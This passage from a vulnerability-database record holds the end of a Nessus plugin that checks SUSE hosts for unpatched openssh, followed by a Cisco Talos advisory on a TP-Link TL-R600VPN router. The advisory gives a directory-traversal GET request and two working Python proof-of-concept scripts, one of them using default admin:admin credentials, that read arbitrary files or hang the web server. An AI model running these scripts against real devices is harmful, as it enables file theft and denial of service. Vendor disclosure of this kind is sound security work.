possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1091396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1105010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1106163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982273\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-15473/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-15919/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183781-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ee5de829\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-openssh-13867=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-openssh-13867=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-6.6p1-36.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-askpass-gnome-6.6p1-36.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-fips-6.6p1-36.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-helpers-6.6p1-36.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "talos": [{"lastseen": "2018-11-19T18:27:34", "references": [], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0617\n\n## TP-Link TL-R600VPN HTTP server denial-of-service vulnerability\n\n##### November 19, 2018\n\n##### CVE Number\n\nCVE-2018-3948 \n\n### Summary\n\nAn exploitable denial-of-service vulnerability exists in the URI-parsing functionality of the TP-Link TL-R600VPN HTTP server. A specially crafted URL can cause the server to stop responding to requests, resulting in downtime for the management portal. An attacker can send either an unauthenticated or authenticated web request to trigger this vulnerability.\n\n### Tested Versions\n\nTP-Link TL-R600VPN HWv3 FRNv1.3.0 TP-Link TL-R600VPN HWv2 FRNv1.2.3\n\n### Product URLs\n\n<https://www.tp-link.com/us/products/details/cat-4909_TL-R600VPN.html>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-835: Loop with Unreachable Exit Condition ('Infinite Loop')\n\n### Details\n\nIf a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable.\n\nAn example malicious GET request is as follows. Notice that this request is to '/etc', not '/etc/' or '/etc/shadow':\n \n \n GET /help/../../../../../../../../../../../../../../../../etc HTTP/1.1\n Host: 192.168.0.1\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.0.1/userRpm/AccessCtrlAccessRulesRpm.htm\n Authorization: Basic YWRtaW46YWRtaW4=\n Connection: close\n Upgrade-Insecure-Requests: 1\n Content-Length: 2\n \n\n[Annotated Disassembly / Decompilation output]\n \n \n LOAD:00426340 loc_426340: # CODE XREF: httpRpmFsA+240\u2193j\n LOAD:00426340 la $t9, read\n LOAD:00426344 move $a0, $s3 # moves the file descriptor into arg 0\n LOAD:00426348 jalr $t9 ; read # triggers a read call\n LOAD:0042634C move $a1, $s2 # moves the filename into arg 1 (/../../../../../etc)\n LOAD:00426350 move $a0, $s5\n LOAD:00426354 lw $gp, 0x110+var_100($sp)\n LOAD:00426358 move $a2, $v0\n LOAD:0042635C move $a1, $s2\n LOAD:00426360 addu $s6, $v0\n LOAD:00426364 la $t9, httpBlockPut\n LOAD:00426368 jalr $t9 ; httpBlockPut # function responsible for writing read data to the socket when possible\n LOAD:0042636C move $s0, $v0 # stores the response code from httpBlockPut - 0x0 for success and 0xFFFFFFFF for failure\n LOAD:00426370 li $v1, 0xFFFFFFFF\n LOAD:00426374 lw $gp, 0x110+var_100($sp)\n LOAD:00426378 beq $v0, $v1, loc_42639C\n LOAD:0042637C subu $a2, $s1, $s6\n LOAD:00426380 lw $v1, 0x110+var_28($sp)\n LOAD:00426384 sltu $v0, $a2, $v1\n LOAD:00426388 movz $a2, $v1, $v0\n LOAD:0042638C beqz $a2, loc_42639C # branches to the file close block if the read has finished\n LOAD:00426390 nop\n LOAD:00426394 bnez $s0, loc_426340 # loops if the read has not yet finished\n LOAD:00426398 nop # NOTE: when a directory or an infinite file is read this will loop indefinitely\n LOAD:0042639C\n \n\n### Exploit proof of concept\n\nThe following proof of concepts can be used to view any readable file on the device by passing the absolute path as the second argument.\n\nIf a directory without the trailing slash is passed, the proof of concept will enter an infinite loop, causing a denial-of-service condition on the web server. When this DoS condition is triggered, only the HTTP server is affected. The other device services continue as normal.\n\nProof of concept for the unauthenticated case:\n \n \n import requests\n import sys\n \n def main():\n if len(sys.argv) != 3:\n print \"\"\n print \"Usage: python dir_traversal.py [ip_addr] [absolute_path]\"\n print \"Example: python dir_traversal.py 192.168.0.1 /etc\"\n print \"\"\n else:\n ip_addr = sys.argv[1]\n custom_dir = sys.argv[2]\n uri=\"http://%s/help/../../../../../../../../../../../../../../../..%s\" % (ip_addr, custom_dir)\n try:\n referer = \"http://%s/Index.htm\" % (ip_addr)\n headers = {'Referer':referer}\n r = requests.get(uri, headers=headers)\n print \"\\n\\nResponse Code: %s\\n\\n\" % (r.status_code)\n print r.text\n except Exception as msg:\n print \"ERROR: %s\" % (msg)\n \n if __name__ == \"__main__\":\n main()\n \n\nProof of concept for the authenticated case:\n \n \n import requests\n import sys\n import base64\n \n def main():\n if len(sys.argv) != 3:\n print \"\"\n print \"Usage: python dir_traversal.py [ip_addr] [absolute_path]\"\n print \"Example: python dir_traversal.py 192.168.0.1 /etc\"\n print \"\"\n else:\n ip_addr = sys.argv[1]\n custom_dir = sys.argv[2]\n uri=\"http://%s/images/../../../../../../../../../../../../../../../..%s\" % (ip_addr, custom_dir)\n try:\n auth = \"Basic %s\" % (base64.b64encode(\"admin:admin\"))\n referer = \"http://%s/userRpm/MenuRpm.htm\" % (ip_addr)\n headers = {'Authorization': auth, 'Referer':referer}\n r = requests.get(uri, headers=headers)\n print \"\\n\\nResponse Code: %s\\n\\n\" % (r.status_code)\n print r.text\n except Exception as msg:\n print \"ERROR: %s\" % (msg)\n \n if __name__ == \"__main__\":\n main()\n \n\n### Timeline\n\n2018-06-28 - Vendor Disclosure \n2018-10-09 - Vendor provided beta test \n2018-10-11 - Patch tested and confirmed fix \n2018-11-19 - Public Release\n\n##### Credit\n\nDiscovered by Jared Rittle of Cisco Talos\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0618\n\nPrevious Report\n\nTALOS-2018-0619\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-11-19T00:00:00", "title": "TP-Link TL-R600VPN HTTP server denial-of-service vulnerability", "type": "talos", "enchantments": {"score": {"modified": "2018-11-19T18:27:34", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3948"], "modified": "2018-11-19T00:00:00", "id": "TALOS-2018-0617", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0617", "cvss": {"score": 0.0, "vector": "NONE"}}]}